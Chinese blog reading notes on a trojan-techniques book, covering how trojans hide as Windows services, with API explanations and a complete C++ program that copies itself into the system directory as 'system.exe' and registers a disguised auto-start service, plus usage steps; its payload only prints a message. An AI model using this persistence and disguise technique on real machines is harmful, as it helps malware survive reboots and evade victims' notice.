• 木马隐藏技术(2) 服务


    此为《木马技术揭秘与防御》系列读书笔记


    windows 服务

    包括四大部分:

    • 服务控制管理器 Service Control management
    • 服务控制程序 Service Control Program
    • 服务程序 Service Program
    • 服务配置程序 Service Configuration Program

    使用服务的好处:

    • 可以“自启动”,多了一种自启动方式
    • 在用户登录前开始运行,可以在服务启动时加入杀防火墙的代码
    • 在后台运行,不容易被用户发现

    常用Windows API:

    SC_HANDLE WINAPI OpenSCManager(
      __in_opt  LPCTSTR lpMachineName,  // If the pointer is NULL or points to an empty string, the function connects to the service control manager on the local computer.
      __in_opt  LPCTSTR lpDatabaseName, // 数据库  If it is NULL, the SERVICES_ACTIVE_DATABASE database is opened by default.
      __in      DWORD dwDesiredAccess   // SC_MANAGER_ALL_ACCESS
    );

    SCManager:服务控制管理器

    包含几方面的信息:

    1.已安装服务数据库:在注册表中拥有一个已安装服务的数据库,位于:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services

    2.自启动服务:系统启动时,SCManager 启动所有启动类型为“自动”的服务,和相关依赖服务。在注册表中的位置为:

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceGroupOrder

    3.服务记录列表:包含每个服务的一堆属性

    4.因要求而启动的服务、服务控制管理器句柄 等等。

    SERVICE_STATUS_HANDLE WINAPI RegisterServiceCtrlHandler(  //Registers a function to handle service control requests.
      __in  LPCTSTR lpServiceName,
      __in  LPHANDLER_FUNCTION lpHandlerProc  
    );

    注册处理服务控制请求的函数指针

    BOOL WINAPI SetServiceStatus(  // Updates the service control manager's status information for the calling service.
      __in  SERVICE_STATUS_HANDLE hServiceStatus,
      __in  LPSERVICE_STATUS lpServiceStatus
    );

    设置服务的状态,SERVICE_STATUS 结构体的成员真多,不过大部分给默认值0就可以了。

    SC_HANDLE WINAPI CreateService(
      __in       SC_HANDLE hSCManager,  //利用 OpenSCManager 获得SCManager句柄
      __in       LPCTSTR lpServiceName, // 自己定义,作为服务名显示
      __in_opt   LPCTSTR lpDisplayName, // 自己定义,出现在服务的描述栏
      __in       DWORD dwDesiredAccess,  // 给 SC_MANAGER_ALL_ACCESS 
      __in       DWORD dwServiceType,   
      __in       DWORD dwStartType,
      __in       DWORD dwErrorControl,
      __in_opt   LPCTSTR lpBinaryPathName,
      __in_opt   LPCTSTR lpLoadOrderGroup,
      __out_opt  LPDWORD lpdwTagId,
      __in_opt   LPCTSTR lpDependencies,
      __in_opt   LPCTSTR lpServiceStartName,
      __in_opt   LPCTSTR lpPassword
    );

    创建服务。

    代码示例:

    View Code
      1 #include <iostream>
      2 #include <windows.h>
      3 #include <string>
      4 #include <string.h>
      5 #include <winsvc.h>
      6 
      7 using namespace std;
      8 
      9 BOOL InstallCmdService();
     10 void RemoveCmdService();
     11 void WINAPI ServiceMain(DWORD,LPTSTR *);
     12 void WINAPI ServiceCtrlHandle(DWORD);
     13 void door();
     14 
     15 SERVICE_STATUS m_ServiceStatus;
     16 SERVICE_STATUS_HANDLE m_ServiceStatusHandle;
     17 BOOL bRunning = true;
     18 
     19 int main(int argc,char* argv[])
     20 {
     21     SERVICE_TABLE_ENTRYA DispatchTable[] = 
     22     {
     23         {"system",ServiceMain},
     24         {NULL,NULL}
     25     };
     26 
     27     if(2 == argc){
     28         if(!stricmp(argv[1],"-i")){    
     29             InstallCmdService();
     30         }
     31         if(!stricmp(argv[1],"-r")){
     32             RemoveCmdService();
     33         }
     34     }
     35     StartServiceCtrlDispatcher(DispatchTable);
     36     return 0;
     37 }
     38 
     39 void WINAPI ServiceMain(DWORD dwArgc,LPTSTR * lpArgv)
     40 {
     41     m_ServiceStatus.dwCheckPoint = 0;
     42     m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
     43     m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
     44     m_ServiceStatus.dwServiceSpecificExitCode = 0;
     45     m_ServiceStatus.dwServiceType = SERVICE_WIN32;
     46     m_ServiceStatus.dwWaitHint = 0;
     47     m_ServiceStatus.dwWin32ExitCode = 0;
     48 
     49     m_ServiceStatusHandle = RegisterServiceCtrlHandler("system",ServiceCtrlHandle);
     50     if(m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0){
     51         return;
     52     }
     53     m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
     54     m_ServiceStatus.dwCheckPoint = 0;
     55     m_ServiceStatus.dwWaitHint = 0;
     56     if(SetServiceStatus(m_ServiceStatusHandle,&m_ServiceStatus)){
     57         bRunning = true;
     58     }
     59     door();
     60 }
     61 
     62 void WINAPI ServiceCtrlHandle(DWORD Opcode)
     63 {
     64     switch(Opcode){
     65     case SERVICE_CONTROL_PAUSE:
     66         m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
     67         break;
     68     case SERVICE_CONTROL_CONTINUE:
     69         m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
     70         break;
     71     case SERVICE_CONTROL_STOP:
     72         m_ServiceStatus.dwWin32ExitCode = 0;
     73         m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
     74         m_ServiceStatus.dwCheckPoint = 0;
     75         m_ServiceStatus.dwWaitHint = 0;
     76         SetServiceStatus(m_ServiceStatusHandle,&m_ServiceStatus);
     77         bRunning = false;
     78         break;
     79     case SERVICE_CONTROL_INTERROGATE:
     80         break;
     81     }
     82 }
     83 
     84 BOOL InstallCmdService()
     85 {
     86     char strDir[1024];
     87     SC_HANDLE schSCManager,schService;
     88 
     89     GetCurrentDirectory(1024,strDir);
     90     // If first parameter is NULL, GetModuleFileName retrieves the path of the executable file of the current process.
     91     GetModuleFileName(NULL,strDir,sizeof(strDir));
     92 
     93     char chSysPath[1024];
     94     GetSystemDirectory(chSysPath,sizeof(chSysPath));
     95     strcat(chSysPath,"\\system.exe");
     96 
     97     cout<<"strdir:"<<strDir<<endl;
     98     cout<<"sysPath:"<<chSysPath<<endl;
     99     if(CopyFile(strDir,chSysPath,false)){
    100         cout<<"Copy file success!"<<endl;
    101     }
    102     strcpy(strDir,chSysPath);
    103     schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
    104     if(schSCManager == NULL){
    105         cout<<"open scmanager failed! may be you have no privilege to do this."<<endl;
    106         return false;
    107     }
    108     
    109     LPCSTR lpBinaryPathName = strDir;    
    110     schService = CreateService(schSCManager,"system","system",SC_MANAGER_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_NORMAL,lpBinaryPathName,
    111                     NULL,NULL,NULL,NULL,NULL);
    112 
    113     if(schService){
    114         cout<<"install service success!"<<endl;
    115     }else{
    116         return false;
    117     }
    118     CloseServiceHandle(schService);
    119     return true;
    120 }
    121 
    122 void RemoveCmdService()
    123 {
    124     SC_HANDLE scm,service;
    125     char name[100];
    126     SERVICE_STATUS status;
    127     strcpy(name,"system");
    128 
    129     if((scm = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS)) == NULL){
    130         cout<<"OpenSCManager Error"<<endl;
    131     }
    132     
    133     service = OpenService(scm,name,SC_MANAGER_ALL_ACCESS|DELETE);
    134     if(!service){
    135         cout<<"OpenService Failed"<<endl;
    136     }
    137 
    138     BOOL bSuccess = QueryServiceStatus(service,&status);
    139     if(!bSuccess){
    140         cout<<"QueryServiceStatus ERROR"<<endl;
    141     }
    142 
    143     if(status.dwCurrentState != SERVICE_STOPPED){
    144         bSuccess = ControlService(service,SERVICE_CONTROL_STOP,&status);
    145         if(!bSuccess){
    146             cout<<"ControlService ERROR!"<<endl;
    147         }
    148         Sleep(500);
    149     }
    150 
    151     bSuccess = DeleteService(service);
    152     if(!bSuccess){
    153         cout<<"delete service error"<<endl;
    154     }else{
    155         cout<<"delete service success!"<<endl;
    156     }
    157 
    158     CloseServiceHandle(service);
    159     CloseServiceHandle(scm);
    160 }
    161 
    162 void door()
    163 {
    164     cout<<"hi, trojan is running, haha!"<<endl;
    165 }

     使用方法:

    编译的程序为hi.exe

    1.安装服务:hi -i 

    hi.exe会被copy到%system%路径下,并命名为system.exe。安装的服务名为system

    2.启动服务:net start system

    3.卸载服务:hi -r

  • 相关阅读:
    数据更新
    MVC学习笔记
    const关键字同static readonly 的区别
    RSS
    C语言中取地址跟C++中的引用是一个意思吗?
    生产者消费者模式
    使用foreach的时候,不能对List进修改,怎么办?
    SQL查询
    Windows下的Java访问USB设备解决之道(翻译Java libusb / libusbwin32 wrapper)
    Java SE 6d新特性: 编译器 API
  • 原文地址:https://www.cnblogs.com/handt/p/2627228.html
Copyright © 2020-2023  润新知